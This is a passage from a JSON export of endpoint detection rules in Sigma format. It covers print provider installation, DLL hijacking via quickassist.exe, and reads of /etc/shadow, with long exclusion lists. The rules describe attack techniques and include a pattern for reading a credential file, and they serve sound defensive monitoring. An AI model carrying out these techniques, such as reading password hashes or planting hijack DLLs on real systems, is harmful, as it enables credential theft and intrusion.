'novauiv6.dll'\n TargetObject|endswith: '\\Version-3\\novapdf server *\\Configuration File'\n - Details: 'nrg63du.dll'\n TargetObject|endswith: '\\Version-3\\nrg mp c2500 pcl 6\\Configuration File'\n - Details: 'okx05nui.dll'\n TargetObject|endswith: '\\Version-3\\oki c834 pcl6\\Configuration File'\n - Details: 'pxc50uiaf.dll'\n TargetObject|endswith: '\\Version-3\\pdf-xchange * for finereader\\Configuration File'\n - Details: 'pdf???ps5ui64.dll'\n TargetObject|endswith: '\\Version-3\\pdf??? printer driver\\Configuration File'\n - Details: 'pdfillps?ui.dll'\n TargetObject|endswith: '\\Version-3\\pdfill writer\\Configuration File'\n - Details: 'pb50ui64.dll'\n TargetObject|endswith: '\\Version-3\\printboss *\\Configuration File'\n - Details: 'ric68tu.dll'\n TargetObject|endswith: '\\Version-3\\pro c7500 n-50a pcl6\\Configuration File'\n - Details: 'rc30u.dll'\n TargetObject|endswith: '\\Version-3\\riso comcolor 7150\\Configuration File'\n - Details: 'ml285pdu.dll'\n TargetObject|endswith: '\\Version-3\\samsung ml-2850 series\\Configuration File'\n - Details: 'cmprecntui.dll'\n TargetObject|endswith: '\\Version-3\\Sharpdesk composer\\Configuration File'\n - Details: 'skypdfuipro.dll'\n TargetObject|endswith: '\\Version-3\\skypdf pro driver\\Configuration File'\n - Details: 'up898srui.dll'\n TargetObject|endswith: '\\Version-3\\sony * series\\Configuration File'\n - Details: 'gxe6nu.dll'\n TargetObject|endswith: '\\Version-3\\sp 330sfn pcl 6\\Configuration File'\n - Details: 'es4px6ui.dll'\n TargetObject|endswith: '\\Version-3\\Toshiba e-studio*\\Configuration File'\n - Details: 'novaui*.dll'\n TargetObject|endswith: '\\Version-3\\novapdf *\\Configuration File'\n - Details: 'ss0iu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp *\\Configuration File'\n - Details: 'zdnui50.dll'\n TargetObject|endswith: '\\Version-3\\zdesigner *\\Configuration File'\n - Details: 'winhttp.dll'\n TargetObject|endswith: '\\Version-3\\1234\\Configuration File'\n - Details: 'av?ui56.dll'\n TargetObject|endswith: '\\Version-3\\avery *\\Configuration File'\n - Details: 'braui56.dll'\n TargetObject|endswith: '\\Version-3\\brady *\\Configuration File'\n - Details: 'ql58nui.dll'\n TargetObject|endswith: '\\Version-3\\Brother ql-580n\\Configuration File'\n - Details: 'c50ui.dll'\n TargetObject|endswith: '\\Version-3\\c50 card printer\\Configuration File'\n - Details: 'dl??????.dll'\n TargetObject|endswith: '\\Version-3\\dell *\\Configuration File'\n - Details: 'buauifnt_enc18.dll'\n TargetObject|endswith: '\\Version-3\\encore 18+ black ice driver\\Configuration File'\n - Details: 'epobf9ac.dll'\n TargetObject|endswith: '\\Version-3\\Epson al-m2000 advanced\\Configuration File'\n - Details: 'epobx9ac.dll'\n TargetObject|endswith: '\\Version-3\\Epson al-m400 advanced\\Configuration File'\n - Details: 'e1yuicace.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-p8500d series\\Configuration File'\n - Details: 'e_32ulc2de.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t3400 series\\Configuration File'\n - Details: 'e_32ulc1ee.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t5200d series\\Configuration File'\n - Details: 'e1yuicbpe.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-c5890 series\\Configuration File'\n - Details: 'e1yuiccge.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-m5899 series\\Configuration File'\n - Details: 'gpcrpui64.dll'\n TargetObject|endswith: '\\Version-3\\graphtec craft robo pro s\\Configuration File'\n - Details: 'in#idp-u.d64'\n TargetObject|endswith: '\\Version-3\\honeywell *\\Configuration File'\n - Details: 'lttilaser-*_sui.dll'\n TargetObject|endswith: '\\Version-3\\ilaser-*_s\\Configuration File'\n - Details: 'ric67lu.dll'\n TargetObject|endswith: '\\Version-3\\imc*\\Configuration File'\n - Details: 'fra55lu.dll'\n TargetObject|endswith: '\\Version-3\\infotec mp 501 pcl 5e\\Configuration File'\n - Details: 'ss#epl-u.d64'\n TargetObject|endswith:\n - '\\Version-3\\intermec pf8d\\Configuration File'\n - '\\Version-3\\zebra tlp2844\\Configuration File'\n - Details: 'magui.dll'\n TargetObject|endswith: '\\Version-3\\magicard *\\Configuration File'\n - Details: 'novauiv*.dll'\n TargetObject|endswith: '\\Version-3\\novapdf oem * printer driver\\Configuration File'\n - Details: 'novexxsolutionsui.dll'\n TargetObject|endswith: '\\Version-3\\novexx *\\Configuration File'\n - Details: 'rica????.dll'\n TargetObject|endswith: '\\Version-3\\nrg *\\Configuration File'\n - Details: 'oplv_ui.dll'\n TargetObject|endswith: '\\Version-3\\oki *\\Configuration File'\n - Details: 'pc#tsc-u.d64'\n TargetObject|endswith: '\\Version-3\\pdc *\\Configuration File'\n - Details: 'pdfprnui.dll'\n TargetObject|endswith:\n - '\\Version-3\\pdf architect 5 driver\\Configuration File'\n - '\\Version-3\\pdf architect 4 driver\\Configuration File'\n - '\\Version-3\\soda pdf desktop driver\\Configuration File'\n - Details: 'pxc50uia.dll'\n TargetObject|endswith: '\\Version-3\\pdf-xchange *\\Configuration File'\n - Details: 'pdfescape desktop_pdfprnui_v*.dll'\n TargetObject|endswith: '\\Version-3\\pdfescape desktop driver\\Configuration File'\n - Details: 'fppint?.dll'\n TargetObject|endswith: '\\Version-3\\pdffactory ?\\Configuration File'\n - Details: 'sx_p*_d.dll'\n TargetObject|endswith: '\\Version-3\\perfect pdf * premium driver\\Configuration File'\n - Details: 'r???????.dll'\n TargetObject|endswith: '\\Version-3\\ricoh *\\Configuration File'\n - Details: 'gxe5jau.dll'\n TargetObject|endswith: '\\Version-3\\ricoh sp c262dnw pcl 5c\\Configuration File'\n - Details: 'rc40dui.dll'\n TargetObject|endswith: '\\Version-3\\riso comcolor black fw1230\\Configuration File'\n - Details: 'rte_wrui.dll'\n TargetObject|endswith: '\\Version-3\\rte com services\\Configuration File'\n - Details: 'ss?????.dll'\n TargetObject|endswith: '\\Version-3\\samsung *\\Configuration File'\n - Details: 'rica7rui.dll'\n TargetObject|endswith: '\\Version-3\\savin im c4500 pcl 6\\Configuration File'\n - Details: 'sn0xu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp mx-4101n fax\\Configuration File'\n - Details: 'skypdfuipro_mt.dll'\n TargetObject|endswith: '\\Version-3\\skypdf pro mt driver\\Configuration File'\n - Details: 'pyrmdui.dll'\n TargetObject|endswith: '\\Version-3\\slidemate as\\Configuration File'\n - Details: 'tobi_ui.dll'\n TargetObject|endswith: '\\Version-3\\Toshiba e-studio403s(pcl)\\Configuration File'\n - Details: 'es6cx6ui.dll'\n TargetObject|endswith: '\\Version-3\\Toshiba e-studio6530cseriespcl6\\Configuration File'\n - Details: '?s#tsc-u.d64'\n TargetObject|endswith: '\\Version-3\\tsc tc200\\Configuration File'\n - Details: 'sxp2mdu.dll'\n TargetObject|endswith: '\\Version-3\\xerox phaser 3250\\Configuration File'\n - Details: 'xr?k2axpui.dll'\n TargetObject|endswith: '\\Version-3\\xerox workcentre *\\Configuration File'\n - Details: 'nl_zebraui.dll'\n TargetObject|endswith: '\\Version-3\\zebra *\\Configuration File'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\n# level: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a77686d-2ab7-4cde-9662-336a29faed1a",
"rule_name": "Spoolsv Print Provider Added",
"rule_description": "Detects the installation of a new print provider.\nAttackers may install new print provider services to exploit vulnerabilities in the printer service (such as CVE-2021-1675) and gain code execution through the spoolsv binary.\nIt is recommended to analyze the DLL pointed to by the registry value to determine its legitimacy, as well as to look for malicious actions originating from the spoolsv process.\n",
"rule_creation_date": "2021-07-01",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4ad70790-9646-46dc-b8ec-f145eb8a04ba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082094Z",
"creation_date": "2026-03-23T11:45:34.082096Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082100Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_quickassist.yml",
"content": "title: DLL Hijacking via quickassist.exe\nid: 4ad70790-9646-46dc-b8ec-f145eb8a04ba\ndescription: |\n Detects potential Windows DLL Hijacking via quickassist.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'quickassist.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\CRYPTBASE.DLL'\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\dxgi.dll'\n - '\\PROPSYS.dll'\n - '\\SAS.dll'\n - '\\SspiCli.dll'\n - '\\UxTheme.dll'\n - '\\WindowsCodecs.dll'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4ad70790-9646-46dc-b8ec-f145eb8a04ba",
"rule_name": "DLL Hijacking via quickassist.exe",
"rule_description": "Detects potential Windows DLL Hijacking via quickassist.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4af5cd27-b69e-4679-a1b5-b6f72cc439aa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.650422Z",
"creation_date": "2026-03-23T11:45:35.296928Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296932Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_008_etc_shadow_read.yml",
"content": "title: File /etc/shadow Read\nid: 4af5cd27-b69e-4679-a1b5-b6f72cc439aa\ndescription: |\n Detects an attempt to read /etc/shadow.\n This file contains the encrypted passwords of all the accounts on the system.\n The content of this file is often used to gather information about the system and for offline password cracking.\n It is recommended to ensure that the process accessing this file is legitimate and that it will keep its content secret.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/16\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Path: '/etc/shadow'\n ProcessParentImage|contains: '?'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '*/systemd'\n - '*/sudo'\n - '*/su'\n - '*/sshd'\n - '*/cron'\n - '/usr/sbin/in.rshd'\n - '/usr/sbin/crond'\n - '/usr/bin/crond'\n - '/usr/bin/crontab'\n - '*/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '*/polkit-agent-helper-?'\n - '/usr/lib/x86_64-linux-gnu/sddm/sddm-helper'\n - '/usr/sbin/smbd'\n - '/usr/sbin/lightdm'\n - '/usr/libexec/accounts-daemon'\n - '/bin/login'\n - '/usr/bin/login'\n - '/usr/sbin/usermod'\n - '/usr/sbin/useradd'\n - '/usr/sbin/userdel'\n - '/usr/bin/passwd'\n - '/usr/bin/chage'\n - '/usr/sbin/pwck'\n - '/usr/bin/chsh'\n - '/usr/bin/chfn'\n - '/usr/bin/clamscan'\n - '/usr/sbin/xrdp-sesman'\n - '/usr/bin/newgrp'\n - '/usr/lib/openssh/sftp-server'\n - '/usr/lib/openssh/sshd-session'\n - '/usr/local/libexec/sshd-session'\n - '/usr/libexec/openssh/sshd-session'\n - '/usr/lib/ssh/sshd-session'\n - '/usr/libexec/ssh/sshd-session'\n - '/sbin/apk'\n - '/usr/sbin/atd'\n - '/usr/bin/id'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/lib/systemd/systemd-userwork'\n - '/usr/sbin/chpasswd'\n - '/bin/chpasswd'\n - '/lib/systemd/systemd-logind'\n - '/usr/lib/systemd/systemd-logind'\n - '/usr/bin/systemd-tmpfiles'\n - '/usr/bin/pwck'\n - '/usr/lib/kscreenlocker_greet'\n - '/usr/lib/sddm/sddm-helper'\n - '/usr/bin/systemd-sysusers'\n - '/usr/libexec/xfce4-screensaver-dialog'\n - '/usr/lib/x86_64-linux-gnu/libexec/kcheckpass'\n - '/usr/sbin/gdm3'\n - '/usr/bin/git'\n - '/usr/bin/screen'\n - '/usr/lib/systemd/systemd-executor'\n - '/usr/bin/cupsd'\n - '/usr/sbin/cupsd'\n - '/usr/bin/mono-sgen'\n - '/usr/sbin/openvpn'\n - '/usr/lib/accounts-daemon'\n - '/usr/bin/runuser'\n - '/usr/sbin/runuser'\n - '/usr/bin/pwhistory_helper'\n - '/usr/sbin/pwhistory_helper'\n - '/usr/bin/getent'\n - '/usr/libexec/packagekitd'\n - '/usr/lib/dovecot/auth'\n - '/usr/NX/bin/nxexec'\n - '/usr/libexec/openscap/probe_shadow'\n - '/usr/lib/x86_64-linux-gnu/openscap/probe_shadow'\n - '/usr/bin/oscap'\n - '/usr/lib/x86_64-linux-gnu/openscap/probe_textfilecontent54'\n - '/usr/bin/xtrlock'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/schroot'\n - '/usr/bin/lslogins'\n - '/usr/sbin/freeradius'\n - '/usr/bin/mksquashfs'\n - '/usr/sbin/sshd-knock'\n - '/usr/bin/rsync'\n - '/usr/bin/greetd'\n - '/usr/sbin/pure-ftpd-virtualchroot'\n - '/usr/sbin/selinux_helper'\n - '/usr/sbin/lid'\n - '/usr/lib/x86_64-linux-gnu/xrdp/xrdp-sesexec'\n - '/usr/bin/md5sum'\n - '/usr/bin/sha1sum'\n - '/usr/bin/sha256sum'\n - '/usr/sbin/saslauthd'\n\n exclusion_image:\n ProcessImage:\n - '/usr/lib/rstudio-server/bin/rserver-pam'\n - '/usr/lib/rstudio-server/bin/rserver-launcher'\n - '/usr/local/manageengine/uems_agent/bin/dctaskengine'\n - '/usr/openv/netbackup/bin/bpdbsbora'\n - '/opt/jc/bin/jcosqueryi'\n - '*/sqllib/adm/db2syscr'\n - '/opt/mqm/bin/security/amqoamax'\n - '/opt/grid/*/perl/bin/perl'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/nessus_agent/sbin/nessus-agent-module'\n - '/opt/VRTSperl/bin/perl'\n - '/opt/VRTSsfmh/bin/perl'\n - '/opt/netbackup/openv/netbackup/bin/bpbkar'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/Druva/EnterpriseWorkloads/bin/PhoenixFSDtBackupAgent'\n - '/opt/universal/ubroker/sbin/cskern'\n - '/usr/local/ipdiva/cleanroom/sbin/xrdp-sesman'\n - '/opt/psa/admin/sbin/sys_auth'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/bin/make|'\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/opt/a5000/infra/utils/bin/osconfexec|' # Mitel\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage:\n - '/usr/bin/apt'\n - '/usr/bin/apt-get'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp1:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_cmp2:\n ProcessCurrentDirectory: '/var/backups/'\n ProcessCommandLine: 'cmp -s shadow.bak /etc/shadow'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_debconf_1:\n - ProcessCommandLine:\n - '/usr/bin/perl*/usr/share/debconf/frontend /sbin/update-secureboot-policy *'\n - '/usr/bin/perl*/usr/share/debconf/frontend /usr/sbin/update-grub-legacy-ec2'\n - '/usr/bin/perl*/usr/share/debconf/frontend /usr/sbin/needrestart*'\n - '/usr/bin/perl*/bin/debconf-communicate -fnoninteractive update-notifier'\n - '/usr/bin/perl*/usr/share/debconf/frontend /usr/sbin/pam-auth-update --force --package'\n - ProcessParentCommandLine:\n - '/usr/bin/python3 /usr/bin/unattended-upgrade'\n - '/usr/bin/python3 /usr/lib/update-notifier/package-data-downloader'\n\n exclusion_debconf_2:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n\n exclusion_authconfig:\n ProcessCommandLine:\n - '/usr/bin/python /sbin/authconfig'\n - '/usr/bin/python? /sbin/authconfig'\n\n exclusion_gdm:\n ProcessCommandLine: 'gdm-session-worker [pam/gdm-*]'\n exclusion_dkms:\n - ProcessCommandLine|contains: '/usr/sbin/dkms'\n - ProcessParentCommandLine|contains: '/usr/sbin/dkms'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dkms'\n exclusion_cron_daily_passwd:\n ProcessCommandLine:\n - 'cmp -s shadow.bak /etc/shadow'\n - 'cp -p /etc/shadow shadow.bak'\n ProcessParentCommandLine: '/bin/sh /etc/cron.daily/passwd'\n exclusion_eset:\n ProcessImage|startswith: '/opt/eset/'\n exclusion_deepsecurity:\n ProcessImage|startswith: '/opt/ds_agent/'\n exclusion_auditbeat:\n ProcessImage|endswith: '/auditbeat'\n exclusion_fusioninventory:\n - ProcessName: 'fusioninventory-agent'\n - ProcessCommandLine|contains: 'fusioninventory-agent'\n exclusion_sap:\n - ProcessImage:\n - '*/sapuxuserchk'\n - '/usr/sap/hostctrl/exe/sapdbctrl'\n - ProcessParentImage|endswith: '/saphostexec'\n exclusion_hana:\n ProcessImage|endswith: '/sdbrun'\n exclusion_proftpd:\n ProcessImage|endswith: '/proftpd'\n exclusion_vmware:\n ProcessImage|endswith: '/vmtoolsd'\n exclusion_aide:\n ProcessImage|endswith: '/aide'\n exclusion_mcafee:\n ProcessImage|startswith: '/opt/McAfee/'\n exclusion_netbackup:\n ProcessImage|endswith:\n - '/nbatd'\n - '/nbtelesched'\n - '/netb'\n - '/nbtelemetry'\n - '/bpjava-msvc'\n exclusion_landscape:\n - ProcessCommandLine|contains: '/usr/bin/landscape-client'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/landscape-client'\n - '/usr/bin/python3 /usr/bin/landscape-client'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/landscape-client'\n exclusion_gcworker:\n ProcessImage: '/opt/GC_Service/GC/gc_worker'\n exclusion_cockpit:\n - ProcessImage: '/usr/lib/cockpit/cockpit-session'\n - ProcessParentImage: '/usr/libexec/cockpit-session'\n - ProcessAncestors|contains: '|/usr/libexec/cockpit-session|'\n exclusion_vsftpd:\n ProcessImage: '/usr/sbin/vsftpd'\n exclusion_pgsql:\n ProcessParentCommandLine|contains: 'sh /usr/share/postgresql-common/pg_updateaptconfig'\n exclusion_pgisready:\n - ProcessCommandLine: '/usr/bin/perl /usr/bin/pg_isready'\n - ProcessCommandLine|startswith: '/usr/bin/perl /usr/bin/pg_isready '\n - ProcessParentCommandLine|startswith: '/bin/sh -c pg_isready '\n exclusion_pg:\n ProcessCommandLine|startswith:\n - '/usr/lib/postgresql/*/bin/psql '\n - '/usr/bin/perl /usr/bin/pg_dump '\n - '/usr/lib/postgresql/??/bin/pg_restore '\n - '/usr/lib/postgresql/??/bin/pg_dumpall'\n - '/usr/bin/perl /usr/bin/pg_dumpall'\n - '/usr/bin/perl -wT /usr/bin/pg_lsclusters '\n - '/usr/bin/perl -w /usr/bin/pg_createcluster '\n - '/usr/bin/perl -wT /usr/bin/pg_upgradecluster '\n - '/usr/bin/perl /bin/pg_restore '\n exclusion_glpi_agent1:\n ProcessImage:\n - '/usr/bin/perl'\n - '/snap/glpi-agent/*/usr/share/glpi-agent/bin/perl'\n ProcessCommandLine|contains:\n - 'glpi-agent'\n - '/usr/bin/perl /usr/bin/glpi-inventory'\n exclusion_glpi_agent2:\n ProcessCommandLine: 'glpi-agent (tag *): waiting'\n exclusion_psql:\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/bin/psql'\n - '/usr/bin/perl -w /usr/bin/psql'\n exclusion_netatalk:\n ProcessImage:\n - '/usr/sbin/afpd'\n - '/usr/local/sbin/afpd'\n ProcessParentImage:\n - '/usr/sbin/afpd'\n - '/usr/local/sbin/afpd'\n exclusion_x2go:\n - ProcessCommandLine:\n - '/usr/bin/perl /usr/bin/x2golistsessions'\n - '/usr/bin/perl -XU /usr/lib/x2go/libx2go-server-db-sqlite3-wrapper.pl *'\n - '/usr/bin/perl /usr/lib/x2go/x2golistsessions_sql *'\n - ProcessParentCommandLine:\n - '/usr/bin/perl /usr/sbin/x2gocleansessions'\n - '/usr/bin/perl /usr/bin/x2gosessionlimit'\n - '/bin/bash /usr/bin/x2gosuspend-session*'\n - '/bin/bash /usr/bin/x2goruncommand*'\n - ProcessGrandparentCommandLine: '/usr/bin/perl /usr/sbin/x2gocleansessions'\n exclusion_omiserver:\n ProcessImage: '/opt/omi/bin/omiserver'\n exclusion_laps_1:\n ProcessCommandLine: '/bin/bash /usr/local/sbin/laps'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n exclusion_laps_2:\n ProcessCommandLine: '/bin/bash /usr/local/libexec/laps'\n exclusion_qualys1:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - 